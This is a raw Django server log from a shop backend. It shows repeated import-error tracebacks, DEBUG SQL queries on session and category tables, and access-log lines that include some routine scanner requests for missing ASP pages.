**kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 117, in inner_run self.check(display_num_errors=True) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 390, in check include_deployment_checks=include_deployment_checks, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 377, in _run_checks return checks.run_checks(**kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/registry.py", line 72, in run_checks new_errors = check(app_configs=app_configs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 13, in check_url_config return check_resolver(resolver) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 23, in check_resolver return check_method() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 399, in check for pattern in self.url_patterns: File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 584, in url_patterns patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 577, in urlconf_module return import_module(self.urlconf_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py", line 31, in url(r'^api/v1/', include(('shopapi.urls', 'shopapi'), namespace='shopapi')), File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/conf.py", line 34, in include urlconf_module = import_module(urlconf_module) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/urls.py", line 3, in from shopapi.views import CategoryView, CategoryDetailView, ProductView, ProductDetailView, SameCategoryProductsView, TopicView, QuestionsView, AnswerbyTopicView, QuestionsDetailView File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/views.py", line 3, in from shopapi.serializers import CategorySerializer, ProductSerializer, SameCategoryProductsSerializer, TopicSerializer, \ File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py", line 3, in from faq.models import Topic, Question ModuleNotFoundError: No module named 'faq' /home/resfx/public_html/admin.resfx.com/backend/manage.py changed, reloading. Performing system checks... Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 117, in inner_run self.check(display_num_errors=True) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 390, in check include_deployment_checks=include_deployment_checks, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 377, in _run_checks return checks.run_checks(**kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/registry.py", line 72, in run_checks new_errors = check(app_configs=app_configs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 13, in check_url_config return check_resolver(resolver) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 23, in check_resolver return check_method() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 399, in check for pattern in self.url_patterns: File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 584, in url_patterns patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 577, in urlconf_module return import_module(self.urlconf_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py", line 31, in url(r'^api/v1/', include(('shopapi.urls', 'shopapi'), namespace='shopapi')), File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/conf.py", line 34, in include urlconf_module = import_module(urlconf_module) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/urls.py", line 3, in from shopapi.views import CategoryView, CategoryDetailView, ProductView, ProductDetailView, SameCategoryProductsView, TopicView, QuestionsView, AnswerbyTopicView, QuestionsDetailView File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/views.py", line 3, in from shopapi.serializers import CategorySerializer, ProductSerializer, SameCategoryProductsSerializer, TopicSerializer, \ File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py", line 3, in from faq.models import Topic, Question ModuleNotFoundError: No module named 'faq' /home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py changed, reloading. Performing system checks... Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 323, in run_from_argv self.execute(*args, **cmd_options) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 60, in execute super().execute(*args, **options) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 364, in execute output = self.handle(*args, **options) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 67, in handle if not settings.DEBUG and not settings.ALLOWED_HOSTS: File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/conf/__init__.py", line 79, in __getattr__ self._setup(name) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/conf/__init__.py", line 66, in _setup self._wrapped = Settings(settings_module) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/conf/__init__.py", line 157, in __init__ mod = importlib.import_module(self.SETTINGS_MODULE) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 941, in _find_and_load_unlocked File "", line 219, in _call_with_frames_removed File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'django_shop_tutorial' During handling of the above exception, another exception occurred: Traceback (most recent call last): File "manage.py", line 22, in execute_from_command_line(sys.argv) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 381, in execute_from_command_line utility.execute() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 375, in execute self.fetch_command(subcommand).run_from_argv(self.argv) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 336, in run_from_argv connections.close_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 219, in close_all for alias in self: File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 213, in __iter__ return iter(self.databases) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 147, in databases self._databases = settings.DATABASES File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/conf/__init__.py", line 79, in __getattr__ self._setup(name) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/conf/__init__.py", line 66, in _setup self._wrapped = Settings(settings_module) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/conf/__init__.py", line 157, in __init__ mod = importlib.import_module(self.SETTINGS_MODULE) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 941, in _find_and_load_unlocked File "", line 219, in _call_with_frames_removed File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 953, in _find_and_load_unlocked ModuleNotFoundError: No module named 'django_shop_tutorial' Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2020-01-03 03:52:28,337 utils 27361 140408575502080 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2020-01-03 03:52:28,344 utils 27361 140408575502080 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2020-01-03 03:52:31,611 utils 27361 140408542058240 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-03T03:52:31.594127+00:00'::timestamptz AND "django_session"."session_key" = 'xr5d4inze86yuqmoglityeyiwpsl1jm1'); args=(datetime.datetime(2020, 1, 3, 3, 52, 31, 594127, tzinfo=), 'xr5d4inze86yuqmoglityeyiwpsl1jm1') DEBUG 2020-01-03 03:52:31,721 utils 27361 140408542058240 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-17T03:52:31.718122+00:00'::timestamptz WHERE "django_session"."session_key" = 'xr5d4inze86yuqmoglityeyiwpsl1jm1'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 3, 52, 31, 718122, tzinfo=), 'xr5d4inze86yuqmoglityeyiwpsl1jm1') [03/Jan/2020 03:52:31] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2020-01-03 03:52:38,888 utils 27361 140408542058240 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-03T03:52:38.870979+00:00'::timestamptz AND "django_session"."session_key" = 'xr5d4inze86yuqmoglityeyiwpsl1jm1'); args=(datetime.datetime(2020, 1, 3, 3, 52, 38, 870979, tzinfo=), 'xr5d4inze86yuqmoglityeyiwpsl1jm1') DEBUG 2020-01-03 03:52:38,927 utils 27361 140408542058240 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-17T03:52:38.924938+00:00'::timestamptz WHERE "django_session"."session_key" = 'xr5d4inze86yuqmoglityeyiwpsl1jm1'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 3, 52, 38, 924938, tzinfo=), 'xr5d4inze86yuqmoglityeyiwpsl1jm1') [03/Jan/2020 03:52:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Jan/2020 03:55:47] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:22:00] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:27:29] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:32:32] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:35:02] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 04:37:35] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:41:53] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:42:38] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:47:41] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:52:04] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:52:44] "GET / HTTP/1.0" 302 0 [03/Jan/2020 04:57:46] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [03/Jan/2020 05:08:40] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [03/Jan/2020 05:08:47] "GET /dyzl/Print.asp?ArticleID=285 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [03/Jan/2020 05:09:07] "GET /xyzx/SendMail.asp?ArticleID=393 HTTP/1.0" 404 6376 [03/Jan/2020 05:10:06] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:27:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 05:35:32] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:40:35] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:45:38] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:53:31] "GET / HTTP/1.0" 302 0 [03/Jan/2020 05:58:33] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-03 06:01:05,760 utils 27361 140408542058240 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 06:01:05,775 utils 27361 140408542058240 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 06:01:05,782 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 06:01:05,786 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-03 06:01:05,792 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 06:01:05,796 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 06:01:05,800 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 06:01:05,805 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 06:01:05,811 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 06:01:05,820 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 06:01:05,825 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 06:01:05,829 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 06:01:05,833 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 06:01:05,838 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 06:01:05,844 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 06:01:05,848 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 06:01:05,852 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 06:01:05,856 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 06:01:05,861 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 06:01:05,867 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 06:01:05,872 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 06:01:05,876 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 06:01:05,880 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 06:01:05,884 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-03 06:01:05,889 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 06:01:05,895 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 06:01:05,900 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 06:01:05,904 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 06:01:05,908 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 06:01:05,912 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 06:01:05,918 utils 27361 140408542058240 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 06:01:05,922 utils 27361 140408542058240 